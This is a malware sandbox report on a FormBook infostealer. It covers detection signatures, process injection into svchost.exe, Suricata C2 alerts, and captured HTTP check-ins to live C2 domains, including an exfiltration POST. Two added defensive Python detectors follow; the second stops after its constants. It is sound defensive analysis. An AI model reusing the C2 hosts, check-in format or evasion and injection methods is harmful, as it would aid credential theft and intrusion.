
Windows Analysis Report
qlG7x91YXH.exe

Overview

General Information

Sample name: qlG7x91YXH.exe (renamed because the original name is a hash value)
Original sample name: f57ac51331e5239f4cae4e94cbeb985860a6304b5e4822e638e7122915d8a7a2.exe
Analysis ID: 1587751
MD5: 29e38e8c57aea7a49657e5960d12f3e9
SHA1: f7d3a8409c04c762baab30d5ef54becb38360c74
SHA256: f57ac51331e5239f4cae4e94cbeb985860a6304b5e4822e638e7122915d8a7a2
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • qlG7x91YXH.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\qlG7x91YXH.exe" MD5: 29E38E8C57AEA7A49657E5960D12F3E9)
    • svchost.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\qlG7x91YXH.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • sUcUmdUxGfN.exe (PID: 5308 cmdline: "C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ROUTE.EXE (PID: 7972 cmdline: "C:\Windows\SysWOW64\ROUTE.EXE" MD5: C563191ED28A926BCFDB1071374575F1)
          • sUcUmdUxGfN.exe (PID: 2056 cmdline: "C:\Program Files (x86)\zaZHuGfdCofFvgUkemKshKcyQcDBATTvaQvWKiLsOtASWuf\sUcUmdUxGfN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8136 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
Note: both sUcUmdUxGfN.exe processes carry the PDB path R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb (listed under the binary strings below), which identifies them as the sandbox's own fake-browser decoy rather than a file dropped by the sample. The processes that matter for this sample are the svchost.exe started by the dropper, ROUTE.EXE and firefox.exe, all of which FormBook is injected into according to the Yara memory hits.
No configs have been found
Yara matches in memory dumps (every entry matched rule JoeSecurity_FormBook_1, description "Yara detected FormBook", author Joe Security; the Strings column is empty):
  00000001.00000002.2268978745.0000000003A90000.00000040.10000000.00040000.00000000.sdmp
  00000006.00000002.3014344224.0000000002A90000.00000040.80000000.00040000.00000000.sdmp
  00000006.00000002.3015748227.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp
  00000007.00000002.3015655468.0000000001430000.00000040.80000000.00040000.00000000.sdmp
  00000006.00000002.3014639405.0000000002D30000.00000004.00000800.00020000.00000000.sdmp
  (3 further entries are collapsed on the page; the complete list of memory sources appears under AV Detection)

Yara matches in unpacked PE files (same rule, description and author):
  1.2.svchost.exe.400000.0.unpack
  1.2.svchost.exe.400000.0.raw.unpack

                System Summary

Sigma rule matches (event: process started)

Rule: Uncommon Svchost Parent Process; author: Florian Roth (Nextron Systems)
Rule: (name not given on the page); author: vburov

Both rules matched the same event:
  Image: C:\Windows\SysWOW64\svchost.exe
  NewProcessName: C:\Windows\SysWOW64\svchost.exe
  OriginalFileName: C:\Windows\SysWOW64\svchost.exe
  ProcessId: 7552
  ProcessName: svchost.exe
  Command / CommandLine / ProcessCommandLine: "C:\Users\user\Desktop\qlG7x91YXH.exe"
  CommandLine|base64offset|contains: (empty)
  ParentImage: C:\Users\user\Desktop\qlG7x91YXH.exe
  ParentCommandLine: "C:\Users\user\Desktop\qlG7x91YXH.exe"
  ParentProcessId: 7496
  ParentProcessName: qlG7x91YXH.exe

Note that the command line recorded for the svchost.exe process (PID 7552) is the sample's own path, not an svchost.exe invocation, so image and command line do not match. Together with the "Creates a process in suspended mode", "Writes to foreign memory regions" and thread-injection signatures above, and the Yara hit on 1.2.svchost.exe.400000.0.unpack that locates the unpacked payload inside that process at 0x400000, this is the footprint of the dropper starting svchost.exe and injecting FormBook into it.
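Added example (not part of the Joe Sandbox report and not the Sigma rules' own logic): a small triage script that applies the conditions behind the Sigma match above to process-creation events. The first event reproduces the svchost.exe creation recorded above (PID 7552, parent PID 7496, mismatched command line); the allowlist of legitimate svchost.exe parents, the "-k" heuristic, the event field names and the two benign control events are assumptions made for illustration.

```python
"""Triage of Windows process-creation events for svchost.exe anomalies (added example)."""
import ntpath
from dataclasses import dataclass
from typing import Dict, List

# Assumed allowlist of parents that legitimately start svchost.exe; real
# deployments carry a longer, environment-specific list.
LEGIT_SVCHOST_PARENTS = {"services.exe"}


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def exe_from_cmdline(cmdline: str) -> str:
    """Executable path named by a Windows command line: either a double-quoted
    first token or an unquoted first token ending at the first whitespace."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split()[0] if s else ""


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def check_event(ev: Dict[str, object]) -> List[Finding]:
    pid = int(ev["ProcessId"])
    image = _base(str(ev["Image"]))
    parent = _base(str(ev["ParentImage"]))
    cmd = str(ev["CommandLine"])
    findings: List[Finding] = []

    # 1. Image vs. command line. A hollowed process keeps the command line the
    #    injector passed to CreateProcess; in the event above that is the
    #    dropper's own path, not an svchost.exe invocation.
    cmd_exe = _base(exe_from_cmdline(cmd))
    if cmd_exe and cmd_exe != image:
        findings.append(Finding(pid, "image_cmdline_mismatch", f"image={image} cmdline_exe={cmd_exe}"))

    if image == "svchost.exe":
        # 2. Uncommon parent: the condition behind the Sigma hit above.
        if parent not in LEGIT_SVCHOST_PARENTS:
            findings.append(Finding(pid, "uncommon_svchost_parent", f"parent={parent}"))
        # 3. A genuine svchost.exe is started with "-k <group>"; assumed
        #    heuristic, not part of the Sigma rule shown in this report.
        if " -k " not in f" {cmd} ":
            findings.append(Finding(pid, "svchost_missing_k", "no -k service group on command line"))
    return findings


def triage(events: List[Dict[str, object]]) -> List[Finding]:
    return [f for ev in events for f in check_event(ev)]


# Constructed events. The first reproduces the fields of the Sigma match above;
# the other two are benign controls invented for contrast.
EVENTS: List[Dict[str, object]] = [
    {"ProcessId": 7552,
     "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\qlG7x91YXH.exe"',
     "ParentProcessId": 7496,
     "ParentImage": r"C:\Users\user\Desktop\qlG7x91YXH.exe"},
    {"ProcessId": 1234,  # benign: service host started by the SCM (made up)
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p -s Schedule",
     "ParentProcessId": 700,
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"ProcessId": 4321,  # benign: user-launched editor (made up)
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt',
     "ParentProcessId": 2000,
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"PID {f.pid}: {f.rule} ({f.detail})")
```

Run against the three events, only PID 7552 produces findings, and it produces all three; the two controls are clean. The image/command-line comparison is the check worth keeping in production, because it does not depend on an allowlist and fires on any hollowed process, not only svchost.exe.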
Suricata alerts (all TCP, severity 1)

SID 2050745, ET MALWARE FormBook CnC Checkin (GET) M5, classtype: Malware Command and Control Activity Detected
  Timestamp                          Source             Destination
  2025-01-10T17:44:23.870873+0100    192.168.2.4:49827  156.226.63.13:80
  2025-01-10T17:44:48.763580+0100    192.168.2.4:49985  103.120.80.111:80
  2025-01-10T17:45:18.946952+0100    192.168.2.4:50012  104.21.80.1:80

SID 2855465, ETPRO MALWARE FormBook CnC Checkin (GET) M2, classtype: A Network Trojan was detected
  Timestamp                          Source             Destination
  2025-01-10T17:44:23.870873+0100    192.168.2.4:49827  156.226.63.13:80
  2025-01-10T17:44:48.763580+0100    192.168.2.4:49985  103.120.80.111:80
  2025-01-10T17:45:18.946952+0100    192.168.2.4:50012  104.21.80.1:80

SID 2855464, ETPRO MALWARE FormBook CnC Checkin (POST) M3, classtype: A Network Trojan was detected
  Timestamp                          Source             Destination
  2025-01-10T17:44:40.836089+0100    192.168.2.4:49933  103.120.80.111:80
  2025-01-10T17:44:43.538626+0100    192.168.2.4:49951  103.120.80.111:80
  2025-01-10T17:44:46.206284+0100    192.168.2.4:49968  103.120.80.111:80
  2025-01-10T17:45:11.259241+0100    192.168.2.4:50009  104.21.80.1:80
  2025-01-10T17:45:13.879500+0100    192.168.2.4:50010  104.21.80.1:80
  2025-01-10T17:45:16.476145+0100    192.168.2.4:50011  104.21.80.1:80
  2025-01-10T17:45:25.172009+0100    192.168.2.4:50013  208.91.197.27:80
  2025-01-10T17:45:27.699824+0100    192.168.2.4:50014  208.91.197.27:80


                AV Detection

Source: qlG7x91YXH.exe; Virustotal: Detection: 76%
Source: qlG7x91YXH.exe; ReversingLabs: Detection: 73%
Source: Yara match; File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000002.2268978745.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3014344224.0000000002A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3015748227.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.3015655468.0000000001430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.3014639405.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2269397258.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2268552454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3015861642.00000000048D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: qlG7x91YXH.exe; Joe Sandbox ML: detected
Source: qlG7x91YXH.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: route.pdb source: svchost.exe, 00000001.00000002.2268794550.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2237168620.000000000361A000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000002.3015192517.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sUcUmdUxGfN.exe, 00000005.00000000.2188712734.00000000008AE000.00000002.00000001.01000000.00000005.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3014341923.00000000008AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: qlG7x91YXH.exe, 00000000.00000003.1794086241.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1794826622.0000000003980000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2269015858.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2169838117.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2172327250.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2269015858.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2268906618.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2270778815.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.0000000003260000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: qlG7x91YXH.exe, 00000000.00000003.1794086241.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, qlG7x91YXH.exe, 00000000.00000003.1794826622.0000000003980000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2269015858.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2169838117.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2172327250.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2269015858.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000006.00000003.2268906618.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000003.2270778815.00000000030AE000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016087973.0000000003260000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ROUTE.EXE, 00000006.00000002.3016728519.000000000388C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3014722953.0000000002DCE000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338192888.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2576491008.000000001AA8C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: route.pdbGCTL source: svchost.exe, 00000001.00000002.2268794550.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2237168620.000000000361A000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000005.00000002.3015192517.0000000000EE8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: ROUTE.EXE, 00000006.00000002.3016728519.000000000388C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3014722953.0000000002DCE000.00000004.00000020.00020000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000000.2338192888.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2576491008.000000001AA8C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\qlG7x91YXH.exe; Code function: 0_2_00DDDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00DDDBBE
Source: C:\Users\user\Desktop\qlG7x91YXH.exe; Code function: 0_2_00DE68EE FindFirstFileW,FindClose,0_2_00DE68EE
Source: C:\Users\user\Desktop\qlG7x91YXH.exe; Code function: 0_2_00DE698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00DE698F
Source: C:\Users\user\Desktop\qlG7x91YXH.exe; Code function: 0_2_00DDD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDD076
Source: C:\Users\user\Desktop\qlG7x91YXH.exe; Code function: 0_2_00DDD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00DDD3A9
Source: C:\Users\user\Desktop\qlG7x91YXH.exe; Code function: 0_2_00DE9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE9642
Source: C:\Users\user\Desktop\qlG7x91YXH.exe; Code function: 0_2_00DE979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00DE979D
Source: C:\Users\user\Desktop\qlG7x91YXH.exe; Code function: 0_2_00DE9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00DE9B2B
Source: C:\Users\user\Desktop\qlG7x91YXH.exe; Code function: 0_2_00DE5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00DE5C97
Source: C:\Windows\SysWOW64\ROUTE.EXE; Code function: 6_2_02AACB20 FindFirstFileW,FindNextFileW,FindClose,6_2_02AACB20
Source: C:\Windows\SysWOW64\ROUTE.EXE; Code function: 4x nop then xor eax, eax; 6_2_02A99E80
Source: C:\Windows\SysWOW64\ROUTE.EXE; Code function: 4x nop then mov ebx, 00000004h; 6_2_031504DF

                Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49827 -> 156.226.63.13:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49827 -> 156.226.63.13:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49933 -> 103.120.80.111:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49951 -> 103.120.80.111:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49985 -> 103.120.80.111:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49985 -> 103.120.80.111:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50009 -> 104.21.80.1:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50012 -> 104.21.80.1:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50012 -> 104.21.80.1:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 208.91.197.27:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50010 -> 104.21.80.1:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49968 -> 103.120.80.111:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 208.91.197.27:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 104.21.80.1:80
Source: DNS query: www.313333.xyz
Source: Joe Sandbox View; IP Address: 103.120.80.111
Source: Joe Sandbox View; ASN Name: WEST263GO-HKWest263InternationalLimitedHK
Source: Joe Sandbox View; ASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 5 times)
Source: C:\Users\user\Desktop\qlG7x91YXH.exe; Code function: 0_2_00DECE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00DECE44
Source: global traffic; HTTP traffic detected:
  GET /0qmw/?3fo=rJKpKBC&h0Z4uv=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.wuyyv4tq.top
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Source: global traffic; HTTP traffic detected:
  GET /5jna/?h0Z4uv=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&3fo=rJKpKBC HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.313333.xyz
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Source: global traffic; HTTP traffic detected:
  GET /0hqe/?h0Z4uv=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&3fo=rJKpKBC HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Host: www.mzkd6gp5.top
  Connection: close
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
Source: global traffic; DNS traffic detected: DNS query: www.wuyyv4tq.top
Source: global traffic; DNS traffic detected: DNS query: www.313333.xyz
Source: global traffic; DNS traffic detected: DNS query: www.mosquitoxp.lol
Source: global traffic; DNS traffic detected: DNS query: www.mzkd6gp5.top
Source: global traffic; DNS traffic detected: DNS query: www.epayassist.net
Source: unknown; HTTP traffic detected:
  POST /5jna/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Accept-Encoding: gzip, deflate, br
  Host: www.313333.xyz
  Origin: http://www.313333.xyz
  Cache-Control: max-age=0
  Content-Type: application/x-www-form-urlencoded
  Connection: close
  Content-Length: 203
  Referer: http://www.313333.xyz/5jna/
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
  Data Raw: 68 30 5a 34 75 76 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 67 4f 53 49 6c 75 68 39 54 4c 6d 59 49 4d 30 51 4f 54 6f 77 64 70 56 56 62 52 57 76 6c 33 6b 68 44 52 52 59 73 43 52 57 70 65 61 69 50 4c 61 76 78 47 61 38 4b 58 49 42 35 43 4a 69 37 44 43 6c 57 41 4e 68 35 35 62 67 74 4b 65 33 54 6f 48 77 44 57 56 66 32 79 78 44 46 79 46 49 34 61 58 56 52 73 4f 66 58 49 46 4f 4e 46 6b 4f 39 36 44 74 74 7a 76 70 36 59 70 59 6c 48 64 6c 59 61 52 44 74 63 6d 4a 42 70 74 76 6a 50 67 42 6a 68 37 76 63 55 58 4d 6a 6f 34 69 64 6c 63 6c 32 55 6a 61 6c 56 71 76 54 41 33 30 72 2f 37 7a 33 44 4b 64 65 6a 6a 58 70 67 3d 3d
  Data Ascii: h0Z4uv=l+uQF2GaIYZVgOSIluh9TLmYIM0QOTowdpVVbRWvl3khDRRYsCRWpeaiPLavxGa8KXIB5CJi7DClWANh55bgtKe3ToHwDWVf2yxDFyFI4aXVRsOfXIFONFkO96Dttzvp6YpYlHdlYaRDtcmJBptvjPgBjh7vcUXMjo4idlcl2UjalVqvTA30r/7z3DKdejjXpg==
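Added example (not from the report and not the logic of the Suricata rules listed above): a heuristic scanner for FormBook-style check-ins over a constructed tab-separated proxy log. The pattern it looks for generalises the three GET requests and the POST shown above: a single four-character path segment, the legacy MSIE 8 User-Agent, and either two query parameters (a short fixed tag plus a long base64 value sent without URL-encoding) or a form body holding only the base64 value. The log format, the regex thresholds and the two benign control lines are assumptions; the URLs, hosts, User-Agent and POST body are the ones recorded above.

```python
"""Heuristic FormBook check-in detection over a constructed proxy log (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set
from urllib.parse import urlsplit

# Assumed heuristics, generalised from the requests in this report.
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")            # single short alphanumeric segment
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")  # long base64-looking value, not URL-encoded
TAG_RE = re.compile(r"^[A-Za-z0-9]{4,12}$")          # short tag that stays fixed across hosts
LEGACY_UA_RE = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE 8\.0; Windows NT 5\.1; Trident/4\.0")


@dataclass(frozen=True)
class Hit:
    method: str
    host: str
    path: str
    tag: Optional[str]  # None for POST check-ins, which carry only the blob
    blob_len: int


def _params(raw: str) -> Dict[str, str]:
    """Split a query string or form body WITHOUT percent-decoding, so the
    '+' and '/' characters inside the base64 blob survive intact."""
    out: Dict[str, str] = {}
    for kv in raw.split("&"):
        if "=" in kv:
            k, v = kv.split("=", 1)
            out[k] = v
    return out


def classify(method: str, url: str, user_agent: str, body: str = "") -> Optional[Hit]:
    """Return a Hit only when User-Agent, path shape and parameter shape all line up."""
    if not LEGACY_UA_RE.match(user_agent):
        return None
    u = urlsplit(url)
    if not PATH_RE.match(u.path):
        return None
    params = _params(u.query if method == "GET" else body)
    blobs = [v for v in params.values() if BLOB_RE.match(v)]
    tags = [v for v in params.values() if TAG_RE.match(v)]
    if method == "GET" and len(params) == 2 and len(blobs) == 1 and len(tags) == 1:
        return Hit(method, u.hostname or "", u.path, tags[0], len(blobs[0]))
    if method == "POST" and len(params) == 1 and len(blobs) == 1:
        return Hit(method, u.hostname or "", u.path, None, len(blobs[0]))
    return None


def scan(log_text: str) -> List[Hit]:
    """Constructed log format: timestamp, client, method, url, user-agent[, body], tab-separated."""
    hits: List[Hit] = []
    for line in log_text.splitlines():
        f = line.split("\t")
        if len(f) < 5:
            continue
        hit = classify(f[2], f[3], f[4], f[5] if len(f) > 5 else "")
        if hit:
            hits.append(hit)
    return hits


def hosts_by_tag(hits: List[Hit]) -> Dict[str, Set[str]]:
    """Pivot on the fixed tag: one build sends the same tag to every domain on its
    candidate list, so the tag ties decoy and live C2 hosts together."""
    out: Dict[str, Set[str]] = defaultdict(set)
    for h in hits:
        if h.tag:
            out[h.tag].add(h.host)
    return dict(out)


UA = ("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; "
      ".NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)")
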